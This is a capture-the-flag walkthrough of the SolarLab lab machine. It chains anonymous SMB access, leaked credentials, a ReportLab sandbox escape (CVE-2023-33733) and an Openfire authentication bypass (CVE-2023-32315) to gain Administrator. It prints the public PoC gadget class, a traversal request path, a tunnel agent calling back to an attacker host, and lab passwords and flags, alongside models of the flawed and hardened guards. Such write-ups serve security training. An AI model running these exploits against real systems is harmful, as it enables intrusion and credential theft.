Solar Lab - Walkthrough

SolarLab is a medium Windows machine that starts with a business website. An SMB share is accessible through a guest session and holds a file with sensitive information about users on the remote machine. An attacker can extract valid credentials from this file and log in to a page that lets employees fill out forms for company purposes. These forms are turned into PDFs with the ReportLab library, which is vulnerable to CVE-2023-33733. After some exploit development and modification, the attacker gets code execution as the user blake on the remote machine. Further enumeration of the machine reveals that Openfire is installed and listening only locally. By tunnelling into the host, the attacker can reach the Openfire Administration Console. The installed version is vulnerable to CVE-2023-32315, which lets the attacker bypass the authentication screen, upload a malicious plugin, and get code execution as the openfire user. The openfire user can read the files left from when the server was installed and extract everything needed to recover the Administrator's Openfire password, which turns out to be reused for the local Administrator account.

Reconnaissance

We begin with an Nmap scan to identify open services:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.16 -oG allPorts

The scan reveals:

PORT      STATE  SERVICE
80/tcp    open   http
135/tcp   open   msrpc
139/tcp   open   netbios-ssn
445/tcp   open   microsoft-ds
6791/tcp  open   hnm

A targeted scan provides more details:

sudo nmap -p80,135,139,445,6791 -sCV 10.10.11.16 -oN targeted
  • HTTP (80) → Nginx 1.24.0, redirecting to solarlab.htb
  • HTTP (6791) → Nginx 1.24.0, redirecting to report.solarlab.htb:6791

We add the hostnames to /etc/hosts:

sudo sh -c 'echo "10.10.11.16 solarlab.htb report.solarlab.htb" >> /etc/hosts'

[Screenshot: the solarlab.htb landing page]

Enumeration

We access an SMB share anonymously:

smbclient -N //10.10.11.16/Documents

We retrieve details-file.xlsx containing credentials:

[Screenshot: contents of details-file.xlsx, a spreadsheet of usernames and passwords]

Testing the credentials on report.solarlab.htb:6791, we find that BlakeB:ThisCanB3typedeasily1@ works.

Exploitation

The report application renders the submitted form into a PDF with ReportLab, and the installed version is vulnerable to CVE-2023-33733, a sandbox escape in ReportLab's rl_safe_eval that gives code execution when attacker-controlled markup is evaluated. Starting from the public proof of concept, we adapt the payload for a Windows target and send it through the form to gain RCE:

[Screenshot: the modified PoC payload being sent to the report endpoint via Burp Suite]
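To see why the sandbox's name check can be fooled, here is an added example, written for this page and not taken from the walkthrough author's payload or from ReportLab's source. It models the attribute-name guard in ReportLab's rl_safe_eval with a simplified stand-in (the denylist, the guard functions and sandboxed_pow are assumptions) and runs the str subclass from the public CVE-2023-33733 proof of concept against it. The real PoC wraps the same expression in a `<para><font color="...">` attribute, because ReportLab passes colour strings it cannot parse directly through rl_safe_eval, and then calls `.system()` on the os module found in the leaked globals; this example stops at leaking the globals dict and shows the type check that defeats the trick.

```python
"""
Added example: a minimal model of the attribute-name guard that
CVE-2023-33733 bypasses in ReportLab's rl_safe_eval sandbox.  It does not
import reportlab; the guard below is a simplified stand-in, not ReportLab's
real code.  The Word class is the one from the public PoC.
"""
import os  # imported so the leaked __globals__ visibly carries an os module

# Stand-in denylist of attribute names the sandbox refuses to resolve (assumption).
DENIED = frozenset({"__globals__", "__builtins__", "__subclasses__", "__class__"})


def guarded_getattr_vulnerable(obj, name):
    """Flawed guard: trusts the name's own startswith() and == behaviour."""
    if name.startswith("__") or name in DENIED:
        raise ValueError("attribute %r is not allowed" % str(name))
    return getattr(obj, name)


def guarded_getattr_fixed(obj, name):
    """Hardened guard: only an exact str is tested, so no overridden method can lie."""
    if type(name) is not str:
        raise TypeError("attribute name must be an exact str")
    if name.startswith("__") or name in DENIED:
        raise ValueError("attribute %r is not allowed" % name)
    return getattr(obj, name)


def make_word_class():
    """Build the str subclass from the public PoC.

    type(type(1)) is the unrestricted type builtin (the sandbox only exposes a
    one-argument wrapper), so it can create a class.  The subclass lies to the
    guard: startswith() always says no, and the first == comparison, which is
    the denylist lookup, returns False.  Every later comparison, made by the
    real getattr while it searches the function type's dict, is true string
    equality, so getattr still resolves __globals__.
    """
    org_type_fun = type(type(1))
    return org_type_fun("Word", (str,), {
        "mutated": 1,
        "startswith": lambda self, x: False,
        "__eq__": lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x,
        "mutate": lambda self: {setattr(self, "mutated", self.mutated - 1)},
        "__hash__": lambda self: hash(str(self)),
    })


def sandboxed_pow(a, b):
    """Stand-in for the Python-level pow wrapper the sandbox exposes.

    Being a Python function rather than the C builtin, it has __globals__,
    and that dict is this module's namespace, os module included.
    """
    return a ** b


def leak_globals(guard):
    """Request sandboxed_pow.__globals__ through the given guard."""
    word = make_word_class()("__globals__")
    return guard(sandboxed_pow, word)


def demo():
    """Return (globals dict leaked past the flawed guard, whether the fix blocked it)."""
    leaked = leak_globals(guarded_getattr_vulnerable)
    try:
        leak_globals(guarded_getattr_fixed)
        blocked = False
    except TypeError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("flawed guard leaked the os module:", leaked["os"] is os)
    print("hardened guard blocked the lookup:", blocked)
```

The mutate counter matters: a plain `__eq__` that always returns False would also pass the denylist, but then the real getattr, which compares the name against the keys of the function type's dict, would never find `__globals__`. Checking `type(name) is str` before looking at the name removes the attacker's ability to influence either comparison.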

We obtain a shell as blake and capture the user flag:

cat ../../Desktop/user.txt

User flag: 145a80073bcc9bf8699ebe25f215304c

Post-Exploitation

We upgrade to a Meterpreter session using Metasploit. Enumerating the system, we find the Openfire administration console listening on port 9090, bound to the local interface only, which is why it did not show up in the external port scan.

Using Ligolo-ng, we tunnel into the host to reach the internal Openfire service. On the attacking machine:

ligolo-proxy -selfcert

On the target:

C:\Users\blake\Documents>agent.exe -connect 10.10.14.9:11601 -ignore-cert

Once the tunnel interface and a route for it are configured on the attacking machine, Ligolo-ng exposes the agent host's loopback interface on the address 240.0.0.1, so the console is reachable at 240.0.0.1:9090:

[Screenshot: the Openfire admin console login page at 240.0.0.1:9090 through the Ligolo tunnel]

Privilege Escalation

We exploit CVE-2023-32315 to bypass authentication and create an admin account:

python3 CVE-2023-32315.py -t http://240.0.0.1:9090

The script creates credentials: 31r7xg:3vws6i

[Screenshot: logged in to the Openfire admin console at 240.0.0.1:9090 with the newly created account]
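The script above hides what the bypass actually is. As an added example, written for this page and neither Openfire's filter code nor the script invoked above, the following models the bug class behind CVE-2023-32315: an authentication filter that exempts the setup wizard's pages by prefix-matching the raw request path, while the servlet container decodes legacy `%uXXXX` escapes and resolves `..` segments only afterwards. The exclusion prefix, the dispatch model and the fixed filter are simplifications and assumptions; the sample path follows the traversal shape published for the CVE.

```python
"""
Added example (not from the walkthrough, not Openfire's code): a model of the
auth-filter bypass behind CVE-2023-32315.  The exclusion list for the
unauthenticated setup pages is matched against the raw request path, while the
container decodes %uXXXX escapes and resolves ".." after that check, so a path
that looks like a setup page is dispatched to an admin page instead.
"""
import posixpath
import re
from urllib.parse import unquote

# Legacy %uXXXX escapes, which some Java containers still decode.
_LEGACY_UNICODE_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")

# Assumed exclusion prefix: pages the setup wizard must serve before any admin
# account exists, and which the filter therefore lets through without a session.
SETUP_PREFIXES = ("setup/setup-",)

# Constructed sample request, following the traversal shape published for the CVE.
TRAVERSAL = "/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp"


def canonicalize(raw_path: str) -> str:
    """Decode %uXXXX and %XX escapes, then resolve '.' and '..' segments."""
    path = _LEGACY_UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), raw_path)
    path = unquote(path)
    # Force a single leading slash so normpath cannot return "//x" and so that
    # ".." can never climb above the web root.
    return posixpath.normpath("/" + path.lstrip("/"))


def vulnerable_requires_auth(raw_path: str) -> bool:
    """Flawed filter: prefix-matches the undecoded path it was handed."""
    rel = raw_path.lstrip("/")
    return not rel.startswith(SETUP_PREFIXES)


def fixed_requires_auth(raw_path: str) -> bool:
    """Hardened filter: decides on the same canonical path the container dispatches."""
    rel = canonicalize(raw_path).lstrip("/")
    return not rel.startswith(SETUP_PREFIXES)


def dispatch(raw_path: str) -> str:
    """Model of the container: the servlet path actually invoked for a request."""
    return canonicalize(raw_path)


def classify(raw_path: str) -> dict:
    """Summarise how one request fares under both filters."""
    return {
        "dispatched_to": dispatch(raw_path),
        "vulnerable_filter_skips_auth": not vulnerable_requires_auth(raw_path),
        "fixed_filter_skips_auth": not fixed_requires_auth(raw_path),
    }


if __name__ == "__main__":
    for path in (TRAVERSAL, "/setup/setup-s/index.jsp", "/user-create.jsp"):
        print(path, "->", classify(path))
```

The general lesson is the parser differential: any access decision taken on a representation that differs from the one the dispatcher finally uses can be steered by whatever the dispatcher decodes and the filter does not. Canonicalising once, early, and making every later component consume only that canonical form closes the whole class, not just the `%u002e` spelling.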

Through the plugin management page of the admin console we upload a malicious plugin that exposes a command shell. It runs inside the Openfire service, so the shell we get is in the context of the openfire user.

The embedded HSQLDB dump C:\Program Files\Openfire\embedded-db\openfire.script (the server's database as an SQL script, not a configuration file) holds the admin user's encryptedPassword value together with the passwordKey property used to encrypt it. We extract both and decrypt the password with the key:

java OpenFireDecryptPass becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
ThisPasswordShouldDo!@

This password is reused for the local Administrator account:

smbclient -U Administrator //10.10.11.16/C$

We retrieve the root flag:

cat root.txt

Root flag: e07ec04da78b9f7dcfee9b02c1f1ba54